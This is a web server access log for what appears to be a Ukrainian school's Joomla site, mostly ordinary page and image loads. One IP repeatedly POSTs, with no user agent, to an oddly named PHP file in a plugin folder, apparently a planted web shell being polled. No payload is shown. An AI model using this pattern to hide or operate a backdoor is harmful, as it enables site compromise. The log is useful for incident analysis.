46.201.33.238 - - [09/Jan/2014:13:49:11 +0200] 200 "GET /templates/shaper_vision/css/modules.css HTTP/1.1" 4782 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:49:11 +0200] 200 "GET /templates/shaper_vision/css/typography.css HTTP/1.1" 5640 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:49:11 +0200] 200 "GET /templates/shaper_vision/css/css3.css HTTP/1.1" 550 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:49:11 +0200] 200 "GET /templates/shaper_vision/css/styles/style1.css HTTP/1.1" 1179 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:49:11 +0200] 200 "GET /templates/shaper_vision/css/menu.css HTTP/1.1" 3887 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:49:11 +0200] 200 "GET /media/system/css/system.css HTTP/1.1" 1592 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:49:11 +0200] 200 "GET /media/system/js/core.js HTTP/1.1" 3616 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:49:11 +0200] 200 "GET /media/system/js/caption.js HTTP/1.1" 800 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:49:11 +0200] 200 "GET /plugins/system/helix/js/menu.js HTTP/1.1" 4164 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:49:11 +0200] 200 "GET /plugins/system/helix/js/totop.js HTTP/1.1" 1029 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:49:11 +0200] 200 "GET /media/system/js/mootools-core.js HTTP/1.1" 31176 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:49:11 +0200] 200 "GET /media/system/js/mootools-more.js HTTP/1.1" 75591 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:49:11 +0200] 200 "GET /images/stories/inside/ny2013-2014.jpg HTTP/1.1" 72122 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:49:11 +0200] 200 "GET /images/photo/2013/klass/klass.jpg HTTP/1.1" 14548 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:49:12 +0200] 200 "GET /images/photo/2013/vipusk/vipusk.jpg HTTP/1.1" 42311 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:49:12 +0200] 200 "GET /images/photo/2013/muz/muz.jpg HTTP/1.1" 17872 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:49:12 +0200] 200 "GET /images/photo/2012/podyaka/podyaka.jpg HTTP/1.1" 20689 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:49:12 +0200] 200 "GET /images/photo/2013/talant/talant.jpg HTTP/1.1" 47128 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:49:12 +0200] 200 "GET /images/photo/2012/1ver/1ver.jpg HTTP/1.1" 22989 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:49:12 +0200] 200 "GET /images/photo/2012/zoo.jpg HTTP/1.1" 13565 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:49:12 +0200] 200 "GET /images/photo/2012/ostannij_dzvonik/dzvn.jpg HTTP/1.1" 11622 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:49:12 +0200] 200 "GET /templates/shaper_vision/images/bg.jpg HTTP/1.1" 5180 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:49:12 +0200] 200 "GET /templates/shaper_vision/images/grass.png HTTP/1.1" 6426 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:49:12 +0200] 200 "GET /templates/shaper_vision/images/logo.png HTTP/1.1" 15888 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:49:12 +0200] 200 "GET /templates/shaper_vision/images/nav-bg.png HTTP/1.1" 2898 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:49:12 +0200] 200 "GET /templates/shaper_vision/images/nav-l.png HTTP/1.1" 3673 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:49:12 +0200] 200 "GET /templates/shaper_vision/images/nav-r.png HTTP/1.1" 14316 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:49:12 +0200] 200 "GET /images/photo/2013/nr/nr.jpg HTTP/1.1" 91028 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:49:12 +0200] 200 "GET /templates/shaper_vision/images/box/box-tl.png HTTP/1.1" 3237 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:49:12 +0200] 200 "GET /images/photo/2013/dp/dp.jpg HTTP/1.1" 224420 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:49:12 +0200] 200 "GET /templates/shaper_vision/images/box/box-tr.png HTTP/1.1" 3213 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:49:12 +0200] 200 "GET /templates/shaper_vision/images/box/box-tm.png HTTP/1.1" 3051 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:49:12 +0200] 200 "GET /images/photo/2013/podarunki/podarunki.jpg HTTP/1.1" 21031 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:49:12 +0200] 200 "GET /templates/shaper_vision/images/box/box-l.png HTTP/1.1" 3650 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:49:12 +0200] 200 "GET /templates/shaper_vision/images/box/box-r.png HTTP/1.1" 3860 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:49:12 +0200] 200 "GET /templates/shaper_vision/images/box/box-bl.png HTTP/1.1" 2891 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:49:12 +0200] 200 "GET /templates/shaper_vision/images/box/box-br.png HTTP/1.1" 3166 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:49:12 +0200] 200 "GET /templates/shaper_vision/images/box/box-bm.png HTTP/1.1" 3047 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:49:12 +0200] 200 "GET /templates/shaper_vision/images/article_separator.png HTTP/1.1" 1633 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:49:12 +0200] 200 "GET /templates/shaper_vision/images/typo/bullet.gif HTTP/1.1" 55 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:49:12 +0200] 200 "GET /templates/shaper_vision/images/box/h3-l.png HTTP/1.1" 3160 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:49:12 +0200] 200 "GET /templates/shaper_vision/images/box/h3-r.png HTTP/1.1" 3383 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:49:12 +0200] 200 "GET /templates/shaper_vision/images/box/h3-m.png HTTP/1.1" 3315 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:49:12 +0200] 200 "GET /templates/shaper_vision/images/footer-bg.png HTTP/1.1" 16888 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:49:12 +0200] 200 "GET /images/photo/2012/kids_games/kids_games.jpg HTTP/1.1" 6602 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:49:13 +0200] 200 "GET /images/photo/2012/rizdvo/rizdvo.jpg HTTP/1.1" 67386 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:49:13 +0200] 200 "GET /images/photo/2013/1/1veres.jpg HTTP/1.1" 127730 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

5.83.132.144 - - [09/Jan/2014:13:50:14 +0200] 499 "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.1" 0 "-" "-" "-"

5.83.132.144 - - [09/Jan/2014:13:49:59 +0200] "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.0" 200 197 "-" "-"

5.83.132.144 - - [09/Jan/2014:13:51:44 +0200] 499 "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.1" 0 "-" "-" "-"

5.83.132.144 - - [09/Jan/2014:13:51:30 +0200] "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.0" 200 197 "-" "-"

5.83.132.144 - - [09/Jan/2014:13:53:15 +0200] 499 "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.1" 0 "-" "-" "-"

5.83.132.144 - - [09/Jan/2014:13:53:00 +0200] "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.0" 200 197 "-" "-"

5.83.132.144 - - [09/Jan/2014:13:54:47 +0200] 499 "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.1" 0 "-" "-" "-"

5.83.132.144 - - [09/Jan/2014:13:54:32 +0200] "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.0" 200 197 "-" "-"

46.201.33.238 - - [09/Jan/2014:13:55:46 +0200] "GET / HTTP/1.0" 200 5520 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36"

46.201.33.238 - - [09/Jan/2014:13:55:46 +0200] 200 "GET / HTTP/1.1" 5296 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:55:46 +0200] 304 "GET /plugins/system/helix/js/totop.js HTTP/1.1" 0 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:55:46 +0200] 304 "GET /plugins/system/helix/js/menu.js HTTP/1.1" 0 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:55:46 +0200] 304 "GET /media/system/js/mootools-more.js HTTP/1.1" 0 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:55:46 +0200] 304 "GET /media/system/js/caption.js HTTP/1.1" 0 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:55:46 +0200] 304 "GET /media/system/js/mootools-core.js HTTP/1.1" 0 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

46.201.33.238 - - [09/Jan/2014:13:55:46 +0200] 304 "GET /media/system/js/core.js HTTP/1.1" 0 "http://skarbmudrosti.com.ua/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36" "-"

5.83.132.144 - - [09/Jan/2014:13:56:16 +0200] 499 "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.1" 0 "-" "-" "-"

5.83.132.144 - - [09/Jan/2014:13:56:01 +0200] "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.0" 200 197 "-" "-"

176.8.158.11 - - [09/Jan/2014:13:56:38 +0200] "GET /index.php/nabir-v-shkolu HTTP/1.0" 200 7974 "http://www.google.co...59026428,d.ZG4" "Mozilla/5.0 (Windows NT 5.1; rv:26.0) Gecko/20100101 Firefox/26.0"

176.8.158.11 - - [09/Jan/2014:13:56:38 +0200] 200 "GET /index.php/nabir-v-shkolu HTTP/1.1" 7663 "http://www.google.co...59026428,d.ZG4" "Mozilla/5.0 (Windows NT 5.1; rv:26.0) Gecko/20100101 Firefox/26.0" "-"

176.8.158.11 - - [09/Jan/2014:13:56:39 +0200] 200 "GET /components/com_foxcontact/css/neon.css HTTP/1.1" 9806 "http://www.skarbmudr...nabir-v-shkolu" "Mozilla/5.0 (Windows NT 5.1; rv:26.0) Gecko/20100101 Firefox/26.0" "-"

176.8.158.11 - - [09/Jan/2014:13:56:39 +0200] 200 "GET /templates/shaper_vision/css/joomla.css HTTP/1.1" 3742 "http://www.skarbmudr...nabir-v-shkolu" "Mozilla/5.0 (Windows NT 5.1; rv:26.0) Gecko/20100101 Firefox/26.0" "-"

176.8.158.11 - - [09/Jan/2014:13:56:39 +0200] 200 "GET /templates/system/css/general.css HTTP/1.1" 2793 "http://www.skarbmudr...nabir-v-shkolu" "Mozilla/5.0 (Windows NT 5.1; rv:26.0) Gecko/20100101 Firefox/26.0" "-"

176.8.158.11 - - [09/Jan/2014:13:56:39 +0200] 200 "GET /templates/shaper_vision/css/template.css HTTP/1.1" 6413 "http://www.skarbmudr...nabir-v-shkolu" "Mozilla/5.0 (Windows NT 5.1; rv:26.0) Gecko/20100101 Firefox/26.0" "-"

176.8.158.11 - - [09/Jan/2014:13:56:39 +0200] 200 "GET /templates/shaper_vision/css/custom.css HTTP/1.1" 1763 "http://www.skarbmudr...nabir-v-shkolu" "Mozilla/5.0 (Windows NT 5.1; rv:26.0) Gecko/20100101 Firefox/26.0" "-"

176.8.158.11 - - [09/Jan/2014:13:56:39 +0200] 200 "GET /templates/system/css/system.css HTTP/1.1" 614 "http://www.skarbmudr...nabir-v-shkolu" "Mozilla/5.0 (Windows NT 5.1; rv:26.0) Gecko/20100101 Firefox/26.0" "-"

176.8.158.11 - - [09/Jan/2014:13:56:39 +0200] 200 "GET /templates/shaper_vision/css/modules.css HTTP/1.1" 4782 "http://www.skarbmudr...nabir-v-shkolu" "Mozilla/5.0 (Windows NT 5.1; rv:26.0) Gecko/20100101 Firefox/26.0" "-"

176.8.158.11 - - [09/Jan/2014:13:56:39 +0200] 200 "GET /templates/shaper_vision/css/typography.css HTTP/1.1" 5640 "http://www.skarbmudr...nabir-v-shkolu" "Mozilla/5.0 (Windows NT 5.1; rv:26.0) Gecko/20100101 Firefox/26.0" "-"

176.8.158.11 - - [09/Jan/2014:13:56:39 +0200] 200 "GET /templates/shaper_vision/css/css3.css HTTP/1.1" 550 "http://www.skarbmudr...nabir-v-shkolu" "Mozilla/5.0 (Windows NT 5.1; rv:26.0) Gecko/20100101 Firefox/26.0" "-"

176.8.158.11 - - [09/Jan/2014:13:56:39 +0200] 200 "GET /templates/shaper_vision/css/styles/style1.css HTTP/1.1" 1179 "http://www.skarbmudr...nabir-v-shkolu" "Mozilla/5.0 (Windows NT 5.1; rv:26.0) Gecko/20100101 Firefox/26.0" "-"

176.8.158.11 - - [09/Jan/2014:13:56:39 +0200] 200 "GET /templates/shaper_vision/css/menu.css HTTP/1.1" 3887 "http://www.skarbmudr...nabir-v-shkolu" "Mozilla/5.0 (Windows NT 5.1; rv:26.0) Gecko/20100101 Firefox/26.0" "-"

176.8.158.11 - - [09/Jan/2014:13:56:39 +0200] 200 "GET /media/system/js/core.js HTTP/1.1" 3616 "http://www.skarbmudr...nabir-v-shkolu" "Mozilla/5.0 (Windows NT 5.1; rv:26.0) Gecko/20100101 Firefox/26.0" "-"

176.8.158.11 - - [09/Jan/2014:13:56:39 +0200] 200 "GET /plugins/system/helix/js/menu.js HTTP/1.1" 4164 "http://www.skarbmudr...nabir-v-shkolu" "Mozilla/5.0 (Windows NT 5.1; rv:26.0) Gecko/20100101 Firefox/26.0" "-"

176.8.158.11 - - [09/Jan/2014:13:56:39 +0200] 200 "GET /plugins/system/helix/js/totop.js HTTP/1.1" 1029 "http://www.skarbmudr...nabir-v-shkolu" "Mozilla/5.0 (Windows NT 5.1; rv:26.0) Gecko/20100101 Firefox/26.0" "-"

176.8.158.11 - - [09/Jan/2014:13:56:39 +0200] 200 "GET /media/system/js/mootools-core.js HTTP/1.1" 31176 "http://www.skarbmudr...nabir-v-shkolu" "Mozilla/5.0 (Windows NT 5.1; rv:26.0) Gecko/20100101 Firefox/26.0" "-"

176.8.158.11 - - [09/Jan/2014:13:56:39 +0200] 200 "GET /media/system/css/system.css HTTP/1.1" 1592 "http://www.skarbmudr...css/system.css" "Mozilla/5.0 (Windows NT 5.1; rv:26.0) Gecko/20100101 Firefox/26.0" "-"

176.8.158.11 - - [09/Jan/2014:13:56:39 +0200] 200 "GET /media/system/js/mootools-more.js HTTP/1.1" 75591 "http://www.skarbmudr...nabir-v-shkolu" "Mozilla/5.0 (Windows NT 5.1; rv:26.0) Gecko/20100101 Firefox/26.0" "-"

176.8.158.11 - - [09/Jan/2014:13:56:39 +0200] 200 "GET /media/com_foxcontact/images/transparent.gif HTTP/1.1" 43 "http://www.skarbmudr...nabir-v-shkolu" "Mozilla/5.0 (Windows NT 5.1; rv:26.0) Gecko/20100101 Firefox/26.0" "-"

176.8.158.11 - - [09/Jan/2014:13:56:39 +0200] "GET /components/com_foxcontact/lib/captcha-drawer.php?cid=680 HTTP/1.0" 200 2249 "http://www.skarbmudr...nabir-v-shkolu" "Mozilla/5.0 (Windows NT 5.1; rv:26.0) Gecko/20100101 Firefox/26.0"

176.8.158.11 - - [09/Jan/2014:13:56:39 +0200] 200 "GET /components/com_foxcontact/lib/captcha-drawer.php?cid=680 HTTP/1.1" 1788 "http://www.skarbmudr...nabir-v-shkolu" "Mozilla/5.0 (Windows NT 5.1; rv:26.0) Gecko/20100101 Firefox/26.0" "-"

176.8.158.11 - - [09/Jan/2014:13:56:40 +0200] 200 "GET /media/com_foxcontact/images/reload-16.png HTTP/1.1" 3412 "http://www.skarbmudr...nabir-v-shkolu" "Mozilla/5.0 (Windows NT 5.1; rv:26.0) Gecko/20100101 Firefox/26.0" "-"

176.8.158.11 - - [09/Jan/2014:13:56:40 +0200] 200 "GET /templates/shaper_vision/images/grass.png HTTP/1.1" 6426 "http://www.skarbmudr...s/template.css" "Mozilla/5.0 (Windows NT 5.1; rv:26.0) Gecko/20100101 Firefox/26.0" "-"

176.8.158.11 - - [09/Jan/2014:13:56:40 +0200] 200 "GET /templates/shaper_vision/images/bg.jpg HTTP/1.1" 5180 "http://www.skarbmudr...s/template.css" "Mozilla/5.0 (Windows NT 5.1; rv:26.0) Gecko/20100101 Firefox/26.0" "-"

176.8.158.11 - - [09/Jan/2014:13:56:40 +0200] 200 "GET /templates/shaper_vision/images/nav-l.png HTTP/1.1" 3673 "http://www.skarbmudr...n/css/menu.css" "Mozilla/5.0 (Windows NT 5.1; rv:26.0) Gecko/20100101 Firefox/26.0" "-"

176.8.158.11 - - [09/Jan/2014:13:56:40 +0200] 200 "GET /templates/shaper_vision/images/logo.png HTTP/1.1" 15888 "http://www.skarbmudr...s/template.css" "Mozilla/5.0 (Windows NT 5.1; rv:26.0) Gecko/20100101 Firefox/26.0" "-"

176.8.158.11 - - [09/Jan/2014:13:56:40 +0200] 200 "GET /templates/shaper_vision/images/nav-bg.png HTTP/1.1" 2898 "http://www.skarbmudr...n/css/menu.css" "Mozilla/5.0 (Windows NT 5.1; rv:26.0) Gecko/20100101 Firefox/26.0" "-"

176.8.158.11 - - [09/Jan/2014:13:56:40 +0200] 200 "GET /templates/shaper_vision/images/nav-r.png HTTP/1.1" 14316 "http://www.skarbmudr...n/css/menu.css" "Mozilla/5.0 (Windows NT 5.1; rv:26.0) Gecko/20100101 Firefox/26.0" "-"

176.8.158.11 - - [09/Jan/2014:13:56:40 +0200] 200 "GET /templates/shaper_vision/images/box/box-tl.png HTTP/1.1" 3237 "http://www.skarbmudr...ss/modules.css" "Mozilla/5.0 (Windows NT 5.1; rv:26.0) Gecko/20100101 Firefox/26.0" "-"

176.8.158.11 - - [09/Jan/2014:13:56:40 +0200] 200 "GET /templates/shaper_vision/images/box/box-tr.png HTTP/1.1" 3213 "http://www.skarbmudr...ss/modules.css" "Mozilla/5.0 (Windows NT 5.1; rv:26.0) Gecko/20100101 Firefox/26.0" "-"

176.8.158.11 - - [09/Jan/2014:13:56:40 +0200] 200 "GET /templates/shaper_vision/images/box/box-tm.png HTTP/1.1" 3051 "http://www.skarbmudr...ss/modules.css" "Mozilla/5.0 (Windows NT 5.1; rv:26.0) Gecko/20100101 Firefox/26.0" "-"

176.8.158.11 - - [09/Jan/2014:13:56:40 +0200] 200 "GET /templates/shaper_vision/images/box/box-l.png HTTP/1.1" 3650 "http://www.skarbmudr...ss/modules.css" "Mozilla/5.0 (Windows NT 5.1; rv:26.0) Gecko/20100101 Firefox/26.0" "-"

176.8.158.11 - - [09/Jan/2014:13:56:40 +0200] 200 "GET /templates/shaper_vision/images/box/box-r.png HTTP/1.1" 3860 "http://www.skarbmudr...ss/modules.css" "Mozilla/5.0 (Windows NT 5.1; rv:26.0) Gecko/20100101 Firefox/26.0" "-"

176.8.158.11 - - [09/Jan/2014:13:56:40 +0200] 200 "GET /templates/shaper_vision/images/breadcrumbs.png HTTP/1.1" 223 "http://www.skarbmudr...s/template.css" "Mozilla/5.0 (Windows NT 5.1; rv:26.0) Gecko/20100101 Firefox/26.0" "-"

176.8.158.11 - - [09/Jan/2014:13:56:40 +0200] 200 "GET /templates/shaper_vision/images/box/box-bl.png HTTP/1.1" 2891 "http://www.skarbmudr...ss/modules.css" "Mozilla/5.0 (Windows NT 5.1; rv:26.0) Gecko/20100101 Firefox/26.0" "-"

176.8.158.11 - - [09/Jan/2014:13:56:40 +0200] 200 "GET /templates/shaper_vision/images/box/box-br.png HTTP/1.1" 3166 "http://www.skarbmudr...ss/modules.css" "Mozilla/5.0 (Windows NT 5.1; rv:26.0) Gecko/20100101 Firefox/26.0" "-"

176.8.158.11 - - [09/Jan/2014:13:56:40 +0200] 200 "GET /media/com_foxcontact/images/checkbox-unchecked.png HTTP/1.1" 710 "http://www.skarbmudr...t/css/neon.css" "Mozilla/5.0 (Windows NT 5.1; rv:26.0) Gecko/20100101 Firefox/26.0" "-"

